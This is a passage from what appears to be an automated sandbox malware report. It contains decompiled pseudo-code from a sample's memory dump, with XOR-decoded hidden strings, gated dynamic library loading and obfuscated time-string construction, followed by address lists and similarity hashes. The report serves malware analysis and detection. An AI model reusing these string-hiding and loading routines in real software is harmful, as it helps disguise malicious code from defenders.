                                                                    							_t294 = _t294 + (_t259 * _t294 | _t197 | _t259);
                                                                    							_t279 = _t279 - 1;
                                                                    						} while (_t279 != 0);
                                                                    						_t199 = E10001FC0(E10002020( &_v260),  &_v300);
                                                                    						_t310 = _t308 + 0xc;
                                                                    						if(_t199 != 0) {
                                                                    							LoadLibraryA( &_v336);
                                                                    							if(_t249 >= 0x5f) {
                                                                    								_t249 = _t249 + 0xffff;
                                                                    							} else {
                                                                    								_t249 = _t249 + 0x67;
                                                                    							}
                                                                    						}
                                                                    						_t250 = _t249 + 0xe07c;
                                                                    						 *(_t310 + 0x13) =  *(_t310 + 0x13) | _t250;
                                                                    						_t201 = E10001FC0(E10002020( &_v260),  &_v352);
                                                                    						_t312 = _t310 + 0xc;
                                                                    						if(_t201 != 0) {
                                                                    							L28:
                                                                    							if(_t250 >= 0x5f) {
                                                                    								_t250 = _t250 + 0xffff;
                                                                    							} else {
                                                                    								_t250 = _t250 + 0x67;
                                                                    							}
                                                                    							E100034D0();
                                                                    							E10003590();
                                                                    							LoadLibraryA( &_v336);
                                                                    							E100013C0( *0x10004008, _t312 + 0x17, _t294);
                                                                    						} else {
                                                                    							_t244 = E10001FC0(E10002020( &_v260),  &_v272);
                                                                    							_t312 = _t312 + 0xc;
                                                                    							if(_t244 != 0) {
                                                                    								goto L28;
                                                                    							}
                                                                    						}
                                                                    						_t207 =  *0x1000400c;
                                                                    						if(_t207 >= 0x65) {
                                                                    							_t208 = _t207 | 0x00000063;
                                                                    						} else {
                                                                    							_t208 = _t207 | 0x0000001f;
                                                                    						}
                                                                    						 *0x1000400c = _t208;
                                                                    						_t211 = E10001FC0(E10002020( &_v260),  &_v308);
                                                                    						_t314 = _t312 + 0xc;
                                                                    						if(_t211 != 0) {
                                                                    							E100035A0();
                                                                    							E10003660();
                                                                    							LoadLibraryA( &_v336);
                                                                    							 *0x10004008 =  *0x10004008 ^ _t250 & 0x0000ffff;
                                                                    						}
                                                                    						_t213 = E10001FC0(E10002020( &_v260),  &_v284);
                                                                    						_t316 = _t314 + 0xc;
                                                                    						if(_t213 != 0) {
                                                                    							E10003670();
                                                                    							if(_t294 >= 0x76) {
                                                                    								_t294 = _t294 - 0x1b;
                                                                    							} else {
                                                                    								_t294 = _t294 & 0x0000004e;
                                                                    							}
                                                                    							E100037A0();
                                                                    							LoadLibraryA( &_v336);
                                                                    						}
                                                                    						_t251 = _t250 +  *(_t316 + 0x13) * (_t250 & 0x0000ffff) * 0xf272;
                                                                    						_t217 = E10001FC0(E10002020( &_v260),  &_v320);
                                                                    						_t318 = _t316 + 0xc;
                                                                    						if(_t217 != 0) {
                                                                    							E100037B0();
                                                                    							 *0x1000400c =  *0x1000400c + ( *0x10004008 * 0x0000003b |  *0x10004008 * 0x0000003b >> 0x00000020) * 0x60;
                                                                    							E10003870();
                                                                    							LoadLibraryA( &_v336);
                                                                    							_t294 = _t294 | _t251 & 0x0000ffff;
                                                                    						}
                                                                    						_t220 = E10001FC0(E10002020( &_v260),  &_v364);
                                                                    						_t308 = _t318 + 0xc;
                                                                    						if(_t220 != 0) {
                                                                    							E100034C0();
                                                                    							LoadLibraryA( &_v336);
                                                                    							E10001390(_t294, _t251 & 0x0000ffff, 0x10004008);
                                                                    						}
                                                                    					}
                                                                    					return E10002A00(0,  *((intOrPtr*)(_t308 + 0x17c)),  *((intOrPtr*)(_t308 + 0x180)),  *((intOrPtr*)(_t308 + 0x184)));
                                                                    				} else {
                                                                    					return _t190;
                                                                    				}
                                                                    				L1:
                                                                    				 *(_t307 + _t252 + 0x14) =  *(_t307 + _t252 + 0x14) ^ 0x000000c9;
                                                                    				_t252 = _t252 + 1;
                                                                    				if(_t252 < 0xd) {
                                                                    					goto L1;
                                                                    				} else {
                                                                    					_v364 = 0xaf;
                                                                    					_v363 = 0xa0;
                                                                    					_v362 = 0xbb;
                                                                    					_v361 = 0xac;
                                                                    					_v360 = 0xaf;
                                                                    					_v359 = 0xa6;
                                                                    					_v358 = 0xb1;
                                                                    					_v357 = 0xe7;
                                                                    					_v356 = 0xac;
                                                                    					_v355 = 0xb1;
                                                                    					_v354 = 0xac;
                                                                    					_v353 = 0xc9;
                                                                    					_t253 = 0;
                                                                    				}
                                                                    				goto L3;
                                                                    			}






































































































































                                                                    0x1000147d
                                                                    0x10001482
                                                                    0x10001486
                                                                    0x1000148a
                                                                    0x1000148f
                                                                    0x10001494
                                                                    0x10001499
                                                                    0x1000149e
                                                                    0x100014a2
                                                                    0x100014a7
                                                                    0x100014ab
                                                                    0x100014af
                                                                    0x100014b3
                                                                    0x100014b7
                                                                    0x100014b7
                                                                    0x10001502
                                                                    0x10001502
                                                                    0x10001502
                                                                    0x10001506
                                                                    0x10001507
                                                                    0x1000150c
                                                                    0x10001511
                                                                    0x10001516
                                                                    0x1000151b
                                                                    0x10001520
                                                                    0x10001525
                                                                    0x10001529
                                                                    0x1000152e
                                                                    0x10001533
                                                                    0x10001538
                                                                    0x1000153c
                                                                    0x10001540
                                                                    0x10001544
                                                                    0x10001548
                                                                    0x10001550
                                                                    0x10001550
                                                                    0x10001554
                                                                    0x10001555
                                                                    0x1000155c
                                                                    0x10001560
                                                                    0x10001564
                                                                    0x10001568
                                                                    0x1000156d
                                                                    0x10001572
                                                                    0x10001577
                                                                    0x1000157c
                                                                    0x10001581
                                                                    0x10001586
                                                                    0x1000158b
                                                                    0x10001590
                                                                    0x10001595
                                                                    0x1000159a
                                                                    0x1000159f
                                                                    0x100015a4
                                                                    0x100015a9
                                                                    0x100015ae
                                                                    0x100015b3
                                                                    0x100015b8
                                                                    0x100015bd
                                                                    0x100015c2
                                                                    0x100015c7
                                                                    0x100015cc
                                                                    0x100015d1
                                                                    0x100015d6
                                                                    0x100015db
                                                                    0x100015e0
                                                                    0x100015e5
                                                                    0x100015ea
                                                                    0x100015ef
                                                                    0x100015f4
                                                                    0x100015f9
                                                                    0x100015fe
                                                                    0x10001603
                                                                    0x10001608
                                                                    0x1000160d
                                                                    0x10001611
                                                                    0x10001615
                                                                    0x10001619
                                                                    0x1000161d
                                                                    0x10001620
                                                                    0x10001620
                                                                    0x10001624
                                                                    0x10001625
                                                                    0x1000162a
                                                                    0x1000162f
                                                                    0x10001634
                                                                    0x10001639
                                                                    0x1000163e
                                                                    0x10001643
                                                                    0x10001648
                                                                    0x1000164d
                                                                    0x10001652
                                                                    0x10001656
                                                                    0x1000165a
                                                                    0x1000165e
                                                                    0x10001662
                                                                    0x10001664
                                                                    0x10001664
                                                                    0x10001668
                                                                    0x10001669
                                                                    0x1000166e
                                                                    0x10001672
                                                                    0x10001676
                                                                    0x1000167a
                                                                    0x1000167e
                                                                    0x10001682
                                                                    0x10001687
                                                                    0x1000168c
                                                                    0x10001691
                                                                    0x10001696
                                                                    0x1000169b
                                                                    0x100016a0
                                                                    0x100016a4
                                                                    0x100016a8
                                                                    0x100016b0
                                                                    0x100016b0
                                                                    0x100016b4
                                                                    0x100016b5
                                                                    0x100016ba
                                                                    0x100016bf
                                                                    0x100016c4
                                                                    0x100016c9
                                                                    0x100016ce
                                                                    0x100016d3
                                                                    0x100016d8
                                                                    0x100016dd
                                                                    0x100016e2
                                                                    0x100016e7
                                                                    0x100016ec
                                                                    0x100016f1
                                                                    0x100016f6
                                                                    0x100016fa
                                                                    0x10001700
                                                                    0x10001700
                                                                    0x10001704
                                                                    0x10001705
                                                                    0x1000170a
                                                                    0x10001712
                                                                    0x10001719
                                                                    0x10001714
                                                                    0x10001714
                                                                    0x10001714
                                                                    0x10001721
                                                                    0x10001726
                                                                    0x1000172b
                                                                    0x10001738
                                                                    0x10001751
                                                                    0x1000175c
                                                                    0x10001767
                                                                    0x10001769
                                                                    0x10001770
                                                                    0x10001779
                                                                    0x1000177b
                                                                    0x1000177b
                                                                    0x10001794
                                                                    0x1000179f
                                                                    0x100017a4
                                                                    0x100017ab
                                                                    0x100017b1
                                                                    0x100017b8
                                                                    0x100017b3
                                                                    0x100017b3
                                                                    0x100017b3
                                                                    0x100017b1
                                                                    0x100017c2
                                                                    0x100017ca
                                                                    0x100017e4
                                                                    0x100017e9
                                                                    0x100017ee
                                                                    0x10001812
                                                                    0x10001816
                                                                    0x1000181d
                                                                    0x10001818
                                                                    0x10001818
                                                                    0x10001818
                                                                    0x10001823
                                                                    0x10001828
                                                                    0x10001832
                                                                    0x1000183e
                                                                    0x100017f0
                                                                    0x10001806
                                                                    0x1000180b
                                                                    0x10001810
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001810
                                                                    0x10001843
                                                                    0x1000184a
                                                                    0x10001850
                                                                    0x1000184c
                                                                    0x1000184c
                                                                    0x1000184c
                                                                    0x10001852
                                                                    0x1000186d
                                                                    0x10001872
                                                                    0x10001877
                                                                    0x10001879
                                                                    0x1000187e
                                                                    0x10001888
                                                                    0x10001895
                                                                    0x10001895
                                                                    0x100018b1
                                                                    0x100018b6
                                                                    0x100018bb
                                                                    0x100018bd
                                                                    0x100018c5
                                                                    0x100018cc
                                                                    0x100018c7
                                                                    0x100018c7
                                                                    0x100018c7
                                                                    0x100018cf
                                                                    0x100018d9
                                                                    0x100018d9
                                                                    0x100018fa
                                                                    0x10001905
                                                                    0x1000190a
                                                                    0x1000190f
                                                                    0x10001911
                                                                    0x10001932
                                                                    0x10001938
                                                                    0x10001942
                                                                    0x10001947
                                                                    0x10001947
                                                                    0x1000195f
                                                                    0x10001964
                                                                    0x10001969
                                                                    0x1000196b
                                                                    0x10001975
                                                                    0x10001981
                                                                    0x10001981
                                                                    0x10001987
                                                                    0x100019af
                                                                    0x10001734
                                                                    0x10001734
                                                                    0x10001734
                                                                    0x100014c0
                                                                    0x100014c0
                                                                    0x100014c4
                                                                    0x100014c8
                                                                    0x00000000
                                                                    0x100014ca
                                                                    0x100014ca
                                                                    0x100014cf
                                                                    0x100014d4
                                                                    0x100014d9
                                                                    0x100014dd
                                                                    0x100014e2
                                                                    0x100014e7
                                                                    0x100014eb
                                                                    0x100014f0
                                                                    0x100014f4
                                                                    0x100014f8
                                                                    0x100014fc
                                                                    0x10001500
                                                                    0x10001500
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.620088521.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000002.00000002.620072527.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000002.00000002.620100922.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_10000000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID: .$.$.$a$a$c$c$c$e$e$e$e$e$e$m$o$p$p$p$r$s$z
                                                                    • API String ID: 1029625771-2202875674
                                                                    • Opcode ID: 769e11efc60453d50741f8e675082b1bd57052cd1095f14a34b9c46ffd46fd4b
                                                                    • Instruction ID: 89aaf91316e12f2657465725f5864fbedfc83ac11a0b5174453393a6a993f337
                                                                    • Opcode Fuzzy Hash: 769e11efc60453d50741f8e675082b1bd57052cd1095f14a34b9c46ffd46fd4b
                                                                    • Instruction Fuzzy Hash: 35F1AE6600C3C299E322C778488469FBFD55BE7164F488B9DF1E54A2E7DA64D209C3B3
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E0040B470(CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                    				struct _TIME_ZONE_INFORMATION _v180;
                                                                    				intOrPtr _v184;
                                                                    				struct _SYSTEMTIME _v200;
                                                                    				signed short _v204;
                                                                    				signed int _v208;
                                                                    				char _v211;
                                                                    				char _v212;
                                                                    				char _v213;
                                                                    				char _v214;
                                                                    				char _v215;
                                                                    				char _v216;
                                                                    				char _v217;
                                                                    				char _v218;
                                                                    				char _v219;
                                                                    				char _v220;
                                                                    				char _v221;
                                                                    				char _v222;
                                                                    				char _v223;
                                                                    				char _v224;
                                                                    				char _v225;
                                                                    				char _v226;
                                                                    				char _v227;
                                                                    				char _v228;
                                                                    				char _v229;
                                                                    				char _v230;
                                                                    				char _v231;
                                                                    				char _v232;
                                                                    				char _v233;
                                                                    				char _v234;
                                                                    				char _v235;
                                                                    				char _v236;
                                                                    				char _v237;
                                                                    				char _v238;
                                                                    				char _v239;
                                                                    				char _v240;
                                                                    				char _v241;
                                                                    				char _v242;
                                                                    				char _v243;
                                                                    				char _v244;
                                                                    				char _v245;
                                                                    				char _v246;
                                                                    				char _v247;
                                                                    				char _v248;
                                                                    				char _v249;
                                                                    				char _v250;
                                                                    				char _v251;
                                                                    				char _v252;
                                                                    				char _v269;
                                                                    				char _v270;
                                                                    				char _v271;
                                                                    				char _v272;
                                                                    				char _v273;
                                                                    				char _v274;
                                                                    				char _v275;
                                                                    				char _v276;
                                                                    				char _v277;
                                                                    				char _v278;
                                                                    				char _v279;
                                                                    				char _v280;
                                                                    				char _v289;
                                                                    				char _v290;
                                                                    				char _v291;
                                                                    				char _v292;
                                                                    				char _v293;
                                                                    				char _v294;
                                                                    				char _v295;
                                                                    				char _v296;
                                                                    				char _v301;
                                                                    				char _v302;
                                                                    				char _v303;
                                                                    				signed int _v304;
                                                                    				signed int _v308;
                                                                    				signed int _v312;
                                                                    				signed int _v316;
                                                                    				char _v317;
                                                                    				char _v318;
                                                                    				char _v319;
                                                                    				signed int _v320;
                                                                    				char _v321;
                                                                    				char _v322;
                                                                    				char _v323;
                                                                    				char _v324;
                                                                    				char _v325;
                                                                    				char _v326;
                                                                    				char _v327;
                                                                    				char _v328;
                                                                    				intOrPtr _v332;
                                                                    				char _v333;
                                                                    				char _v334;
                                                                    				char _v335;
                                                                    				char _v336;
                                                                    				char _v337;
                                                                    				char _v338;
                                                                    				char _v339;
                                                                    				char _v340;
                                                                    				char _v341;
                                                                    				char _v342;
                                                                    				char _v343;
                                                                    				char _v344;
                                                                    				char _v345;
                                                                    				char _v346;
                                                                    				char _v347;
                                                                    				char _v348;
                                                                    				char _v350;
                                                                    				char _v354;
                                                                    				intOrPtr _v356;
                                                                    				char _v358;
                                                                    				intOrPtr _v360;
                                                                    				char _v362;
                                                                    				char _v366;
                                                                    				intOrPtr _v368;
                                                                    				char _v370;
                                                                    				char _v374;
                                                                    				char _v378;
                                                                    				intOrPtr _v380;
                                                                    				char _v382;
                                                                    				char _v386;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr _t293;
                                                                    				intOrPtr _t308;
                                                                    				intOrPtr _t310;
                                                                    				void* _t314;
                                                                    				signed int _t315;
                                                                    				signed int _t316;
                                                                    				signed int _t317;
                                                                    				signed short _t318;
                                                                    				signed short _t319;
                                                                    				signed short _t320;
                                                                    				CHAR* _t323;
                                                                    				signed int _t336;
                                                                    				signed int _t345;
                                                                    
                                                                    				if(_a4 == 0) {
                                                                    					L27:
                                                                    					return 0x26;
                                                                    				} else {
                                                                    					if(_a8 >= 0x26) {
                                                                    						_v342 = 0xdd;
                                                                    						_v272 = 0x97;
                                                                    						_v271 = 0xbc;
                                                                    						_v270 = 0xb3;
                                                                    						_v269 = 0xdd;
                                                                    						_v320 = E0040B420(4,  &_v272,  &_v342);
                                                                    						_v346 = 0x9a;
                                                                    						_v304 = 0xdc;
                                                                    						_v303 = 0xff;
                                                                    						_v302 = 0xf8;
                                                                    						_v301 = 0x9a;
                                                                    						_v312 = E0040B420(4,  &_v304,  &_v346);
                                                                    						_v350 = 0xdd;
                                                                    						_v276 = 0x90;
                                                                    						_v275 = 0xbc;
                                                                    						_v274 = 0xaf;
                                                                    						_v273 = 0xdd;
                                                                    						_v324 = E0040B420(4,  &_v276,  &_v350);
                                                                    						_v354 = 0xc4;
                                                                    						_v293 = 0xc4;
                                                                    						_v296 = 0x85;
                                                                    						_v295 = 0xb4;
                                                                    						_v294 = 0xb6;
                                                                    						_v336 = E0040B420(4,  &_v296,  &_v354);
                                                                    						_v358 = 0xae;
                                                                    						_v292 = 0xe3;
                                                                    						_v291 = 0xcf;
                                                                    						_v290 = 0xd7;
                                                                    						_v289 = 0xae;
                                                                    						_v348 = E0040B420(4,  &_v292,  &_v358);
                                                                    						_v362 = 0x22;
                                                                    						_v280 = 0x68;
                                                                    						_v279 = 0x57;
                                                                    						_v278 = 0x4c;
                                                                    						_v277 = 0x22;
                                                                    						_v356 = E0040B420(4,  &_v280,  &_v362);
                                                                    						_v366 = 0x2e;
                                                                    						_v277 = 0x2e;
                                                                    						_v280 = 0x64;
                                                                    						_v279 = 0x5b;
                                                                    						_v278 = 0x42;
                                                                    						_v336 = E0040B420(4,  &_v280,  &_v366);
                                                                    						_v370 = 0xd7;
                                                                    						_v292 = 0x96;
                                                                    						_v291 = 0xa2;
                                                                    						_v290 = 0xb0;
                                                                    						_v289 = 0xd7;
                                                                    						_v368 = E0040B420(4,  &_v292,  &_v370);
                                                                    						_v374 = 0xbe;
                                                                    						_v328 = 0xed;
                                                                    						_v327 = 0xdb;
                                                                    						_v326 = 0xce;
                                                                    						_v325 = 0xbe;
                                                                    						_v360 = E0040B420(4,  &_v328,  &_v374);
                                                                    						_v378 = 0xf3;
                                                                    						_v321 = 0xf3;
                                                                    						_v324 = 0xbc;
                                                                    						_v323 = 0x90;
                                                                    						_v322 = 0x87;
                                                                    						_v380 = E0040B420(4,  &_v324,  &_v378);
                                                                    						_v382 = 0x4c;
                                                                    						_v320 = 2;
                                                                    						_v319 = 0x23;
                                                                    						_v318 = 0x3a;
                                                                    						_v317 = 0x4c;
                                                                    						_v252 = E0040B420(4,  &_v320,  &_v382);
                                                                    						_v386 = 0x66;
                                                                    						_v336 = 0x22;
                                                                    						_v335 = 3;
                                                                    						_v334 = 5;
                                                                    						_v333 = 0x66;
                                                                    						_t293 = E0040B420(4,  &_v336,  &_v386);
                                                                    						_t345 =  *0x447b54; // 0x0
                                                                    						if(0 == 0) {
                                                                    							 *0x447b24 = _v316;
                                                                    							 *0x447b28 = _v304;
                                                                    							 *0x447b2c = _v312;
                                                                    							 *0x447b30 = _v320;
                                                                    							 *0x447b34 = _v328;
                                                                    							 *0x447b38 = _v332;
                                                                    							 *0x447b3c = _v308;
                                                                    							 *0x447b40 = _v336;
                                                                    							 *0x447b44 = _v324;
                                                                    							_t345 = _t345 | 0x00000001;
                                                                    							 *0x447b54 = _t345;
                                                                    							 *0x447b48 = _v340;
                                                                    							 *0x447b4c = _v208;
                                                                    							 *0x447b50 = _t293;
                                                                    						}
                                                                    						_v342 = 0xf0;
                                                                    						_v340 = 0xa3;
                                                                    						_v339 = 0x85;
                                                                    						_v338 = 0x9e;
                                                                    						_v337 = 0xf0;
                                                                    						_v212 = E0040B420(4,  &_v340,  &_v342);
                                                                    						_v346 = 0xe9;
                                                                    						_v325 = 0xe9;
                                                                    						_v328 = 0xa4;
                                                                    						_v327 = 0x86;
                                                                    						_v326 = 0x87;
                                                                    						_v324 = E0040B420(4,  &_v328,  &_v346);
                                                                    						_v350 = 0x98;
                                                                    						_v344 = 0xcc;
                                                                    						_v343 = 0xed;
                                                                    						_v342 = 0xfd;
                                                                    						_v341 = 0x98;
                                                                    						_v316 = E0040B420(4,  &_v344,  &_v350);
                                                                    						_v354 = 0x8e;
                                                                    						_v320 = 0xd9;
                                                                    						_v319 = 0xeb;
                                                                    						_v318 = 0xea;
                                                                    						_v317 = 0x8e;
                                                                    						_v328 = E0040B420(4,  &_v320,  &_v354);
                                                                    						_v358 = 0x17;
                                                                    						_v345 = 0x17;
                                                                    						_v348 = 0x43;
                                                                    						_v347 = 0x7f;
                                                                    						_v346 = 0x62;
                                                                    						_v204 = E0040B420(4,  &_v348,  &_v358);
                                                                    						_v362 = 0x36;
                                                                    						_v348 = 0x70;
                                                                    						_v347 = 0x44;
                                                                    						_v346 = 0x5f;
                                                                    						_v345 = 0x36;
                                                                    						_v228 = E0040B420(4,  &_v348,  &_v362);
                                                                    						_v366 = 0xf8;
                                                                    						_v344 = 0xab;
                                                                    						_v343 = 0x99;
                                                                    						_v342 = 0x8c;
                                                                    						_v341 = 0xf8;
                                                                    						_t308 = E0040B420(4,  &_v344,  &_v366);
                                                                    						if((_t345 & 0x00000002) == 0) {
                                                                    							 *0x447b08 = _v208;
                                                                    							 *0x447b0c = _v316;
                                                                    							 *0x447b10 = _v304;
                                                                    							 *0x447b14 = _v312;
                                                                    							 *0x447b54 = _t345 | 0x00000002;
                                                                    							 *0x447b18 = _v184;
                                                                    							 *0x447b1c = _v204;
                                                                    							 *0x447b20 = _t308;
                                                                    						}
                                                                    						_v342 = 0x2d;
                                                                    						_v304 = 0;
                                                                    						_v312 = 0;
                                                                    						GetLocalTime( &_v200);
                                                                    						_t310 = _a12;
                                                                    						if(_v200.wMinute <= _t310) {
                                                                    							_v200.wMinute = 0;
                                                                    						} else {
                                                                    							_v200.wMinute = _v200.wMinute - _t310;
                                                                    						}
                                                                    						memset( &_v180, 0, 0x2b << 2);
                                                                    						_t314 = GetTimeZoneInformation( &_v180) - 1;
                                                                    						if(_t314 == 0) {
                                                                    							_t315 = _v180.StandardBias + _v180.Bias;
                                                                    						} else {
                                                                    							_t315 = _v180.Bias;
                                                                    							if(_t314 == 1) {
                                                                    								_t315 = _t315 + _v180.DaylightBias;
                                                                    							}
                                                                    						}
                                                                    						if(_a16 != 0) {
                                                                    							asm("cdq");
                                                                    							_t336 = _t315 / 0x3c;
                                                                    							_v304 = _t336;
                                                                    							_v312 = _t315 % 0x3c;
                                                                    							_v342 = (_t336 & 0xffffff00 | _t336 >= 0x00000000) + (_t336 & 0xffffff00 | _t336 >= 0x00000000) + 0x2b;
                                                                    						}
                                                                    						_t316 =  *0x447b04; // 0x0
                                                                    						if(_t316 >= 0x24) {
                                                                    							_t317 = _t316 ^ 0x0000006b;
                                                                    						} else {
                                                                    							_t317 = _t316 | 0x0000005a;
                                                                    						}
                                                                    						 *0x447b04 = _t317;
                                                                    						_t318 = _v200.wDayOfWeek;
                                                                    						if(_t318 <= 6) {
                                                                    							_v316 = _t318 & 0x0000ffff;
                                                                    						} else {
                                                                    							_v316 = 0;
                                                                    						}
                                                                    						_t319 = _v200.wMonth;
                                                                    						if(_t319 < 1 || _t319 > 0xc) {
                                                                    							_t320 = 0;
                                                                    						} else {
                                                                    							_t320 = _t319 - 1;
                                                                    						}
                                                                    						_v200.wMonth = _t320;
                                                                    						_v246 = 0x4f;
                                                                    						_v238 = 0x4f;
                                                                    						_v233 = 0x4f;
                                                                    						_v228 = 0x4f;
                                                                    						_v223 = 0x4f;
                                                                    						_v216 = 0x4f;
                                                                    						_v212 = 0x4f;
                                                                    						_v204 = _t320 & 0x0000ffff;
                                                                    						_v251 = 0x18;
                                                                    						_v250 = 0x58;
                                                                    						_v243 = 0x18;
                                                                    						_v242 = 0x58;
                                                                    						_v341 = 0x2b;
                                                                    						_v252 = 0xe;
                                                                    						_v249 = 7;
                                                                    						_v248 = 0xb;
                                                                    						_v247 = 0xe;
                                                                    						_v245 = 0xb;
                                                                    						_v244 = 0xe;
                                                                    						_v241 = 0xb;
                                                                    						_v240 = 0xe;
                                                                    						_v239 = 0x1f;
                                                                    						_v237 = 0xb;
                                                                    						_v236 = 0xe;
                                                                    						_v235 = 0x1b;
                                                                    						_v234 = 0x19;
                                                                    						_v232 = 0x11;
                                                                    						_v231 = 0xe;
                                                                    						_v230 = 0x1b;
                                                                    						_v229 = 0x19;
                                                                    						_v227 = 0x11;
                                                                    						_v226 = 0xe;
                                                                    						_v225 = 0x1b;
                                                                    						_v224 = 0x19;
                                                                    						_v222 = 0xb;
                                                                    						_v221 = 0xe;
                                                                    						_v220 = 0x48;
                                                                    						_v219 = 0xe;
                                                                    						_v218 = 0x1b;
                                                                    						_v217 = 0x19;
                                                                    						_v215 = 0xe;
                                                                    						_v214 = 0x1b;
                                                                    						_v213 = 0x19;
                                                                    						_v211 = 0x2b;
                                                                    						_t323 = E0040B420(0x2a,  &_v252,  &_v341);
                                                                    						E0041E5F0();
                                                                    						asm("cdq");
                                                                    						asm("cdq");
                                                                    						wsprintfA(_a4, _t323,  *((intOrPtr*)(0x447b08 + _v320 * 4)), _v200.wMonth & 0x0000ffff,  *((intOrPtr*)(0x447b24 + _v208 * 4)), _v204 & 0x0000ffff, _v200.wDayOfWeek & 0x0000ffff, _v200.wDay & 0x0000ffff, _v200.wHour & 0x0000ffff, _v346, (_v308 ^ 0x00000019) - 0x19, (_v316 ^ 0x00000019) - 0x19);
                                                                    						goto L27;
                                                                    					} else {
                                                                    						return 0;
                                                                    					}
                                                                    				}
                                                                    			}







































































































































                                                                    0x0040b484
                                                                    0x0040bb4c
                                                                    0x0040bb57
                                                                    0x0040b48a
                                                                    0x0040b48e
                                                                    0x0040b4a9
                                                                    0x0040b4ad
                                                                    0x0040b4b2
                                                                    0x0040b4b7
                                                                    0x0040b4bc
                                                                    0x0040b4c5
                                                                    0x0040b4d4
                                                                    0x0040b4d8
                                                                    0x0040b4dd
                                                                    0x0040b4e2
                                                                    0x0040b4e7
                                                                    0x0040b4f9
                                                                    0x0040b4fd
                                                                    0x0040b501
                                                                    0x0040b506
                                                                    0x0040b50b
                                                                    0x0040b510
                                                                    0x0040b519
                                                                    0x0040b51f
                                                                    0x0040b523
                                                                    0x0040b530
                                                                    0x0040b535
                                                                    0x0040b53a
                                                                    0x0040b544
                                                                    0x0040b553
                                                                    0x0040b557
                                                                    0x0040b55c
                                                                    0x0040b561
                                                                    0x0040b566
                                                                    0x0040b57a
                                                                    0x0040b57e
                                                                    0x0040b583
                                                                    0x0040b588
                                                                    0x0040b58d
                                                                    0x0040b591
                                                                    0x0040b59b
                                                                    0x0040b5a1
                                                                    0x0040b5a5
                                                                    0x0040b5b2
                                                                    0x0040b5b7
                                                                    0x0040b5bc
                                                                    0x0040b5c6
                                                                    0x0040b5ca
                                                                    0x0040b5cf
                                                                    0x0040b5d4
                                                                    0x0040b5d9
                                                                    0x0040b5e7
                                                                    0x0040b5f1
                                                                    0x0040b600
                                                                    0x0040b604
                                                                    0x0040b609
                                                                    0x0040b60e
                                                                    0x0040b613
                                                                    0x0040b61c
                                                                    0x0040b622
                                                                    0x0040b626
                                                                    0x0040b633
                                                                    0x0040b638
                                                                    0x0040b63d
                                                                    0x0040b650
                                                                    0x0040b654
                                                                    0x0040b658
                                                                    0x0040b65d
                                                                    0x0040b662
                                                                    0x0040b667
                                                                    0x0040b670
                                                                    0x0040b682
                                                                    0x0040b686
                                                                    0x0040b68b
                                                                    0x0040b690
                                                                    0x0040b695
                                                                    0x0040b699
                                                                    0x0040b69e
                                                                    0x0040b6a7
                                                                    0x0040b6b1
                                                                    0x0040b6bb
                                                                    0x0040b6c5
                                                                    0x0040b6cf
                                                                    0x0040b6d9
                                                                    0x0040b6e3
                                                                    0x0040b6ed
                                                                    0x0040b6f7
                                                                    0x0040b701
                                                                    0x0040b70e
                                                                    0x0040b711
                                                                    0x0040b717
                                                                    0x0040b71d
                                                                    0x0040b723
                                                                    0x0040b723
                                                                    0x0040b738
                                                                    0x0040b73c
                                                                    0x0040b741
                                                                    0x0040b746
                                                                    0x0040b74b
                                                                    0x0040b754
                                                                    0x0040b75d
                                                                    0x0040b761
                                                                    0x0040b76e
                                                                    0x0040b773
                                                                    0x0040b778
                                                                    0x0040b782
                                                                    0x0040b791
                                                                    0x0040b795
                                                                    0x0040b79a
                                                                    0x0040b79f
                                                                    0x0040b7a4
                                                                    0x0040b7ad
                                                                    0x0040b7bc
                                                                    0x0040b7c0
                                                                    0x0040b7c5
                                                                    0x0040b7ca
                                                                    0x0040b7cf
                                                                    0x0040b7d8
                                                                    0x0040b7de
                                                                    0x0040b7e2
                                                                    0x0040b7ef
                                                                    0x0040b7f4
                                                                    0x0040b7f9
                                                                    0x0040b803
                                                                    0x0040b815
                                                                    0x0040b819
                                                                    0x0040b81e
                                                                    0x0040b823
                                                                    0x0040b828
                                                                    0x0040b83a
                                                                    0x0040b841
                                                                    0x0040b846
                                                                    0x0040b84b
                                                                    0x0040b850
                                                                    0x0040b855
                                                                    0x0040b85a
                                                                    0x0040b862
                                                                    0x0040b86f
                                                                    0x0040b879
                                                                    0x0040b883
                                                                    0x0040b890
                                                                    0x0040b8a0
                                                                    0x0040b8a6
                                                                    0x0040b8ac
                                                                    0x0040b8b2
                                                                    0x0040b8b2
                                                                    0x0040b8c1
                                                                    0x0040b8c6
                                                                    0x0040b8ca
                                                                    0x0040b8ce
                                                                    0x0040b8d4
                                                                    0x0040b8e0
                                                                    0x0040b8ec
                                                                    0x0040b8e2
                                                                    0x0040b8e2
                                                                    0x0040b8e2
                                                                    0x0040b902
                                                                    0x0040b912
                                                                    0x0040b913
                                                                    0x0040b938
                                                                    0x0040b915
                                                                    0x0040b916
                                                                    0x0040b91d
                                                                    0x0040b926
                                                                    0x0040b926
                                                                    0x0040b91d
                                                                    0x0040b93e
                                                                    0x0040b940
                                                                    0x0040b946
                                                                    0x0040b94a
                                                                    0x0040b951
                                                                    0x0040b959
                                                                    0x0040b959
                                                                    0x0040b95d
                                                                    0x0040b965
                                                                    0x0040b96c
                                                                    0x0040b967
                                                                    0x0040b967
                                                                    0x0040b967
                                                                    0x0040b96f
                                                                    0x0040b974
                                                                    0x0040b980
                                                                    0x0040b98b
                                                                    0x0040b982
                                                                    0x0040b982
                                                                    0x0040b982
                                                                    0x0040b98f
                                                                    0x0040b99b
                                                                    0x0040b9a7
                                                                    0x0040b9a3
                                                                    0x0040b9a3
                                                                    0x0040b9a3
                                                                    0x0040b9ac
                                                                    0x0040b9bb
                                                                    0x0040b9bf
                                                                    0x0040b9c3
                                                                    0x0040b9c7
                                                                    0x0040b9ce
